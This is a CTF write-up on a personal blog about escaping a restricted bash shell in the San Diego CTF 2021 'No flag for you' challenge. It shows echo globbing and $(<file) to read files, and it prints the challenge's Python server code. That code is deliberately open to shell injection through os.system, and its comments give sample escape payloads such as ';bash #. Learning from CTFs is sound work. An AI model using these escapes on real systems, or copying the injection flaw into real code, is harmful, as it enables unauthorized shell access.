szymanski.ninja
About
CTF Writeups
Contact
pl|en

San Diego CTF 2021: No flag for you

No flag for you

Category: Misc

chal

MEDIUM

Welcome to the most restrictive shell ever, with only 2 semi-functional non-shell commands.

Connect via

nc noflag.sdc.tf 1337

Solution

I always enjoy shell escape challenges. Challenge started in shell, where only two commands are available: ls and cat, both with very limited functionality. Some basic built-in shell commands are also present. Some examples below. 

nc noflag.sdc.tf 1337
There is no flag here.
rbash$ ls
README
bin
opt
rbash$ cat README
Hahahahahaha!

Welcome to the most restrictive shell ever. Don't even try to escape this.
rbash$ ls bin
cat
ls
rbash$ cat bin/ls
No flag for you!
rbash$ ls ../
ls: cannot open directory '../': Permission denied
rbash$ ls /
ls: cannot open directory '/': Permission denied
rbash$ ls opt
rbash$ cd opt
/bin/rbash: line 0: cd: restricted
rbash$ /bin/bash
/bin/rbash: /bin/bash: restricted: cannot specify `/' in command names

After a while, I found the way to browse the list of files with echo ;-) 

rbash$ echo ../*
../no-flag.py ../run
rbash$ echo /*
/bin /boot /dev /etc /home /lib /lib32 /lib64 /libx32 /media /mnt /opt /proc /root /run /sbin /srv /sys /tmp /usr /var
rbash$ echo opt/*
opt/flag-b01d7291b94feefa35e6.txt

And the content of files as well… 

rbash$ echo $(<opt/flag-b01d7291b94feefa35e6.txt)
sdctf{1t'5_7h3_sh3ll_1n_4_shEll}

It was not intented solution, as I read ../no-flag.py. 

rbash$ IFS=""; echo $(<../no-flag.py)
#! /usr/bin/env python3
import os, sys

RBASH_PATH = '/bin/rbash'
RUN_DIRECTORY = os.path.dirname(os.path.realpath(__file__)) + '/run'

print('There is no flag here.')
# Vulnerable to shell injection!
# Sample escape (without ``) without check_quotes: `';bash #`
# Sample escape (without ``) that passes check_quotes: `';bash -c 'bash`
os.chdir(RUN_DIRECTORY)

def check_quotes(ipt: str):
    quote_count_even = True
    for c in ipt:
        if c == "'":
            quote_count_even = not quote_count_even
    if not quote_count_even:
        # Give an error message telling participants that they are on the right track
        print("rbash: INTERNAL ERROR!")
        return False
    return True

try:
    while True:
        ipt = input('rbash$ ')
        if check_quotes(ipt):
            os.system("PATH='{}/bin' {} --noprofile --norc -c '{}' 2>&1".format(RUN_DIRECTORY, RBASH_PATH, ipt))
except EOFError:
    pass

submit

Flag

sdctf{1t'5_7h3_sh3ll_1n_4_shEll}

Privacy Policy
luc © 2021